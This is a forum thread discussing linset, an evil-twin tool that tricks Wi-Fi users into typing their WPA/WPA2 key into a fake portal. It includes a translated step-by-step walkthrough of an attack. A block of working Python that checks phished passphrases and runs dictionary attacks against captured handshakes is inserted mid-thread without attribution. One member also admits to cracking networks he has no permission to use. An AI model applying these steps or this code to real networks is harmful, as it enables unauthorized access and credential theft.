WPA crack NON-BRUTEFORCE!

Cyberscum Member Posts: 795
So I ran across a new (2014 release) WPA cracking tool called linset for Kali. It does not use brute-force techniques to crack WPA; it has a very interesting way of capturing the handshake.

The problem is that I believe it was originally written in Spanish. Has anyone played with this or have a good English tutorial to follow?

Here is some general info on it if anyone is interested:


http://black-hat-sec.org/index.php?topic=87.0


https://www.youtube.com/watch?v=dBDDKTbGpgE

Comments

  • the_Grinch Member Posts: 4,165
    Pretty interesting, I'm surprised the community hasn't come together and translated it to English.
    WIP:
    PHP
    Kotlin
    Intro to Discrete Math
    Programming Languages
    Work stuff
  • zoro_2009 Member Posts: 26
    I understand Arabic, if anyone is interested in the YouTube video!
  • the_Grinch Member Posts: 4,165
    zoro_2009, translate it, man. I'm sure a lot of people will appreciate it, and if you do a video with voiceover you'll probably get a ton of hits on YouTube.
    WIP:
    PHP
    Kotlin
    Intro to Discrete Math
    Programming Languages
    Work stuff
  • Cyberscum Member Posts: 795
    the_Grinch wrote: »
    Pretty interesting, I'm surprised the community hasn't come together and translated it to English.

    They might have; I just can't find anything... I really want to try this out.
  • ryanw4130 Member Posts: 18
    I am curious, is it for WPA, but not for WPA2? As far as I know, WPA2 has not been cracked? Sorry for the rookie question here. lol
  • Cyberscum Member Posts: 795
    ryanw4130 wrote: »
    I am curious, is it for WPA, but not for WPA2? As far as I know, WPA2 has not been cracked? Sorry for the rookie question here. lol

    Define what you mean by "WPA2 has not been cracked" (AES? It has).

    Linset can be used on WPA/2

    It is not the traditional "crack" you are thinking of... Oh, and Aircrack can do something "similar" to this using the "Evil Twin" method.
  • LeBroke Member Posts: 490
    I'm assuming this is not resource intensive and can be run on a potato? If so, it'd be awesome.
  • zoro_2009 Member Posts: 26
    Well, I looked at the video and there is nothing he says (no voice), and the text is nothing but an introduction of what linset is and what it does!
    The rest of the video is only the installation of Linset!
    Then in the last seconds of the video, he says that he will make another video on how to configure and work with the tool!
  • jaywalker Member Posts: 90
    From what I've understood and read so far, the handshake is captured through deauthentication of client/s (using the aircrack-ng suite). The "non brute force" part of the attack = getting those deauthed clients to connect to your evil twin, and hoping they'd be dumb enough to enter their login credentials on the fake login page.

    My assumption is that if the victim does not enter any login information, the handshake cannot be 'checked' against the phished credentials.

    Sources Used:
    Linset's github page (English):
    https://github.com/vk496/linset

    LINSET 0.14 - WPA/2 Hack sin Fuerza Bruta ("WPA/2 hack without brute force", Spanish video)

    Similar to linset:
    https://github.com/sophron/wifiphisher
    Goals for 2015: ICND1 [], ICND2 []
    A winner is you
  • ibn_shaddad Member Posts: 57
    I found this:
    Explaining the Linset tool for grabbing the wireless password - Wifislax distro - TECH-SECU Security Techniques

    It is in Arabic, so I will try my best in translating:

    In the name of God, the Most Gracious, the Most Merciful

    The tool linset: this tool is considered very dangerous, since with it you can easily own its victims and you (the victim) can't figure out what happened. It is one of the tools that come with the Wifislax distro.

    The principle behind this tool is that it connects to the victim's rig and creates a fake network to deceive him, and pushes a pop-up message asking him to enter the pre-shared key one more time to continue the connection. It looks very much like the fake login pages, but this one is still unknown to WiFi users.

    Note: to install the distro, click here.

    To open the tool from Wifislax, we go to the main menu and choose wifislax, then WPA, then linset, as shown in the following picture.


    1.png
    After opening, we will see a list of available interfaces; as you see, we have wlan0, so we choose number 1.


    2.png

    Now another screen; also choose 1 and continue.


    3.png



    Then a new screen, and it will start searching for nearby networks.

    4.png

    After finishing, it will show all the nearby networks, each with a number as you can see, and we can notice that a star is placed on every network that already has a user. Now choose the network number and press enter.


    5.png

    Now press 1 and enter.

    6.png

    Again 1 and enter.

    7.png


    Now here we wait for the tool to grab the handshake, and that is the goal. After we have it, close the window.


    8.png

    After closing the window, we will have the following screen; press 1 and continue.

    9.png

    Now a screen will show to ask you to choose what language you want to use in the pop-up message the victim will see; choose what you want and continue.

    10.png

    The following screen will appear; just wait...

    11.png

    Good, now as we can notice in the following pic, it says "key found" and gives it to us.

    12.png


    Working on: CCNA R&S, CCNA Sec, Security+
    Learning: Python, C and C++
  • ibn_shaddad Member Posts: 57
    are you sure we are not breaking any rules here by posting such things?
    Working on: CCNA R&S, CCNA Sec, Security+
    Learning: Python, C and C++
  • NovaHax Member Posts: 502
    Nothing particularly ground-breaking here. Based on some Google Translate pages :-/...it looks like it still relies on a dictionary attack for cracking the EAPOL handshake. And an evil twin capture of the handshake is easy to do with airbase.

    Wi-Fu - WPA2-PSK Evil Twin Attack

    I did see a screenshot of what may be another option in LINSET that creates a fake access point (presumably with no encryption) and then forces anyone that connects to the attacker-hosted AP to web content that asks for a WPA/WPA2 key, and then just strips it from the HTTP POST (in clear text, thereby avoiding the need to crack the handshake), if the person is dumb enough to do it. It looks absolutely NOTHING like actual WPA authentication... but people are stupid... so I'm sure it still works frequently. But this is a social engineering attack; it's not a new technical crack. It's the technical equivalent of going up and asking someone what the passphrase is.
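The "check" that jaywalker and NovaHax are talking about, as an added example (not linset's code, and not code from this thread): once the evil twin has captured EAPOL message 2 of the real 4-way handshake, a passphrase lifted from the portal's HTTP POST is verified the same way a dictionary cracker verifies each wordlist entry, i.e. PBKDF2 to the PMK, PRF-512 to the KCK, then recompute the frame's MIC and compare. The only difference from a brute-force run is that there is one candidate instead of a wordlist. The SSID, MAC addresses, nonces and the sample message 2 below are constructed test values, not captured data; the PMK test vector ("password"/"IEEE") is the one from the IEEE 802.11i annex.

```python
"""Verify a phished WPA/WPA2-PSK passphrase against a captured 4-way handshake.

Flow used by evil-twin + fake-portal tools: capture EAPOL message 2 from the
real network, collect a passphrase in clear text from the portal's HTTP POST,
then test that single candidate exactly as a dictionary cracker would.
"""
import hashlib
import hmac
import struct

# EAPOL header (4) + descriptor type (1) + key info (2) + key length (2)
# + replay counter (8) + nonce (32) + key IV (16) + RSC (8) + key ID (8) = 81
MIC_OFFSET = 81


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11 PRF-512: HMAC-SHA1 blocks over label || 0x00 || data || counter."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def derive_kck(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """KCK is the first 16 bytes of the PTK; only the KCK is needed to check a MIC."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)[:16]


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """MIC over the whole EAPOL-Key frame with the MIC field zeroed.

    The key descriptor version (low 3 bits of Key Information) selects the
    algorithm: 1 = HMAC-MD5 (WPA/TKIP), 2 = HMAC-SHA1-128 (WPA2/CCMP).
    """
    version = int.from_bytes(eapol[5:7], "big") & 0x7
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    if version == 1:
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    if version == 2:
        return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]
    raise ValueError(f"unsupported key descriptor version {version}")


def verify_passphrase(hs: dict, candidate: str) -> bool:
    """Recompute the MIC of the captured message 2 under `candidate` and compare."""
    pmk = pmk_from_passphrase(candidate, hs["ssid"])
    kck = derive_kck(pmk, hs["ap_mac"], hs["client_mac"], hs["anonce"], hs["snonce"])
    captured_mic = hs["eapol_msg2"][MIC_OFFSET:MIC_OFFSET + 16]
    return hmac.compare_digest(eapol_mic(kck, hs["eapol_msg2"]), captured_mic)


def dictionary_attack(hs: dict, wordlist):
    """The brute-force path the thread contrasts with: first candidate that verifies, or None."""
    for word in wordlist:
        if verify_passphrase(hs, word):
            return word
    return None


def build_sample_handshake(passphrase: str) -> dict:
    """CONSTRUCTED sample: builds EAPOL message 2 the way a real client would
    (RSN descriptor 0x02, key info 0x010a = version 2 | pairwise | MIC, no key data).
    SSID, MACs and nonces are hypothetical test values, not captured data.
    """
    ssid = "ExampleNet"
    ap_mac = bytes.fromhex("001122334455")
    client_mac = bytes.fromhex("66778899aabb")
    anonce = bytes(range(32))
    snonce = bytes(range(32, 64))
    body = (
        b"\x02" + struct.pack(">H", 0x010A) + struct.pack(">H", 0)   # desc, key info, key len
        + struct.pack(">Q", 1) + snonce                               # replay counter, SNonce
        + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8                   # key IV, RSC, key ID
        + b"\x00" * 16 + struct.pack(">H", 0)                         # MIC (zeroed), key data len
    )
    eapol = b"\x02\x03" + struct.pack(">H", len(body)) + body         # EAPOL v2, type Key
    kck = derive_kck(pmk_from_passphrase(passphrase, ssid), ap_mac, client_mac, anonce, snonce)
    mic = eapol_mic(kck, eapol)
    eapol = eapol[:MIC_OFFSET] + mic + eapol[MIC_OFFSET + 16:]
    return {"ssid": ssid, "ap_mac": ap_mac, "client_mac": client_mac,
            "anonce": anonce, "snonce": snonce, "eapol_msg2": eapol}


if __name__ == "__main__":
    hs = build_sample_handshake("correct horse battery")   # what the real client knew
    phished = "correct horse battery"                        # what the portal's POST delivered
    print("phished key matches handshake:", verify_passphrase(hs, phished))
    print("dictionary hit:", dictionary_attack(hs, ["password", "12345678", phished]))
```

The practical takeaway is jaywalker's point: without a captured message 2 (or 3) there is nothing to verify a submitted passphrase against, and the portal would have to take every POST on faith. It also shows why the "non-brute-force" label is only half true: the 4096-round PBKDF2 per candidate is the same cost a cracker pays per wordlist entry; the portal just makes the wordlist one entry long.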
  • Deathmage Banned Posts: 2,496
    I use Aircrack all the time; it comes in handy sometimes when I want to connect to wireless but I don't know the password. I just power on VMware Workstation on my laptop, spin up Ubuntu, run the program and wait like 10 minutes. You'd be surprised how simple most wireless passwords are...

    I used to do aircrack back in college for clients to gauge how strong their wireless password was and to teach them how to make it stronger and harder to crack. I was a whitehat well before I even knew what the term meant...

    Whitehat hacking is something I've always wanted to do; I'm just too busy getting into a niche of system administration, since that to me is where the money is, but I'm sure security-focused hackers make good moolah... someday...
  • lsud00d Member Posts: 1,571
    are you sure we are not breaking any rules here by posting such things?

    As long as everyone understands this is for research purposes only and not used for nefarious reasons, there is no problem having a scholarly discussion on cracking wifi :)

    Also, I lol'd at LINSET's name... taking a page from GNU.
  • VIDEODROME Member Posts: 30
    I've heard some programs work by exploiting WPS rather than cracking the password. I wonder if this is something like that.